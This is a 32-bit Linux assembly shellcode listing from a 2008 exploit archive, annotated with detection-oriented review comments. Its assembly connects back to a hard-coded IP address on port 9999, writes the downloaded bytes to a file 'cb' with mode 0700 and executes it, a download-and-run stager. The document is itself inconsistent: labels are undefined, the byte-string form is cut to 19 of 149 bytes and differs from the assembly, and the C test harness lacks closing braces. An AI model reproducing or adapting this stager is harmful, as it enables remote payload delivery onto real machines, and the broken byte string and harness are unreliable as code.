;file download shellcode (149 bytes)
;connect back, download a file and execute.
;modify the name of the file and the ip address first.
;Advanced Defense Lab(ADL)
; ---------------------------------------------------------------------
; Listing overview (Intel syntax, 32-bit Linux, int 0x80 system calls:
; eax = syscall number, ebx/ecx/edx = arguments).
;
; Syscall chain exactly as written below:
;   socketcall(SYS_SOCKET) -> socketcall(SYS_CONNECT) -> open("cb")
;   -> read(socket) / write(file) -> close(file) -> execve("cb") -> exit(0)
;
; Behaviour visible in the code that is useful for detection and triage:
;   * one outbound TCP connect to a hard-coded IPv4 address and port;
;   * a file named "cb" (relative path, so created in the current
;     working directory) opened with O_CREAT|O_TRUNC and mode 0700;
;   * the same process then calls execve on that same relative path;
;   * no syscall return value is tested for failure anywhere.
;
; NOTE(review): `_start` is declared global and `L1` is a jump target,
; but neither label is defined in the lines shown here.
; ---------------------------------------------------------------------
global _start
; --- socket(AF_INET, SOCK_STREAM, 0) via socketcall --------------------
xor ecx,ecx
mul ecx ;eax*ecx with ecx=0 -> eax=0 and edx=0
xor ebx,ebx
push eax ;protocol = 0
push byte 0x1 ;type = 1 (SOCK_STREAM)
push byte 0x2 ;domain = 2 (AF_INET)
mov ecx,esp ;ecx -> argument array on the stack
inc ebx ;ebx = 1 (socketcall subfunction SYS_SOCKET)
mov al,0x66 ;0x66 = 102 = socketcall
int 0x80
mov edi,eax ;edi = sockfd (return value is not checked)
; --- connect(sockfd, &sockaddr_in, 16) via socketcall ------------------
; sockaddr_in is built on the stack; the comment in the original listing
; gives the port as 9999 (0x270f in network byte order).
push edx ;edx is still 0: zero padding at the end of sockaddr_in
push long 0x2335738c ;sin_addr; in memory 8c 73 35 23 = 140.115.53.35 (marked * by the author)
push word 0x0f27 ;sin_port; in memory 27 0f = 9999 (marked * by the author)
mov dl,0x02
push dx ;sin_family = 2 (AF_INET)
mov ecx,esp ;ecx -> sockaddr_in
push byte 0x10 ;addrlen = 16
push ecx ;pointer to sockaddr_in
push edi ;sockfd
mov ecx,esp ;ecx -> connect() argument array
mov bl,3 ;ebx = 3 (socketcall subfunction SYS_CONNECT)
mov al,102 ;socketcall; only al is written, so this relies on the upper bytes of eax being 0
int 0x80
; --- open("cb", 0x242, 0700) -------------------------------------------
xor ebx,ebx
xor ecx,ecx
push ecx ;NUL terminator for the file name
push word 0x6263 ;in memory 63 62 = "cb"
mov ebx,esp ;ebx -> "cb"
mov cx,0x242 ;flags 0x242 = O_RDWR|O_CREAT|O_TRUNC on Linux i386
mov dx,0x1c0 ;mode 0x1c0 = 0700 octal (owner read/write/execute)
mov al,5 ;5 = open; relies on connect() having returned 0 in eax
int 0x80
mov esi,eax ;esi = file descriptor of "cb" (not checked)
; --- copy loop: read(sockfd, buf, 1000) then write(fd, buf, n) ---------
xor ecx,ecx
mul ecx ;eax = edx = 0
mov dx,0x03e8 ;edx = 1000 = bytes requested per read
xor ebx,ebx
xor eax,eax
mov al,3 ;3 = read
mov ebx,edi ;ebx = sockfd
lea ecx,[esp-1000] ;buffer is the 1000 bytes just below esp (not reserved with sub esp)
int 0x80
mov ebx,esi ;ebx = file descriptor
mov edx,eax ;write length = value returned by read
xor eax,eax
mov al,4 ;4 = write; ecx still points at the buffer
int 0x80
cmp dx,0x03e8 ;was a full 1000-byte chunk read?
je L1 ;continue only after a full chunk; L1 is not defined in this listing
; --- close(fd) ---------------------------------------------------------
mov ebx,esi
xor eax,eax
mov al,6 ;6 = close
int 0x80
; --- execve("cb", {"cb", NULL}, NULL) ----------------------------------
xor ecx,ecx
mul ecx ;eax = edx = 0, so envp (edx) is NULL
push ecx ;NUL terminator
push word 0x6263 ;"cb" again, same relative path that was just written
mov ebx,esp ;ebx -> "cb"
push ecx ;argv[1] = NULL
push ebx ;argv[0] -> "cb"
mov ecx,esp ;ecx -> argv
mov al,0x0b ;0x0b = 11 = execve
int 0x80
; --- exit(0): only reached if execve returns, i.e. it failed -----------
xor eax,eax
xor ebx,ebx ;exit status 0
inc eax ;eax = 1 = exit
int 0x80
/* Byte-string form of the listing above. Only the first 19 bytes are present
 * here (the header advertises 149), and the statement has no terminating
 * semicolon as shown. The bytes also differ from the assembly listing: a 0x99
 * (cdq) sits between "31 db" (xor ebx,ebx) and "50" (push eax) that the
 * listing does not contain, so a signature or hash built from one form will
 * not necessarily match the other. */
unsigned char shellcode[]="\x31\xc9\xf7\xe1\x31\xdb\x99\x50\x6a\x01\x6a\x02\x89\xe1\x43\xb0\x66\xcd\x80"
/* k(): test-harness stub. The function has no closing brace in this listing. */
void k(){
int *ret;
/* ret is set to the address two ints above its own stack slot.
 * NOTE(review): in harnesses of this style that slot is presumably the saved
 * return address, but no store through ret appears in the lines shown. */
ret=(int *)&ret+2;
/* main(): as shown it only returns 0; no call to k() is visible here, and the
 * closing brace is missing. */
int main (){
return 0;
// milw0rm.com [2008-08-25]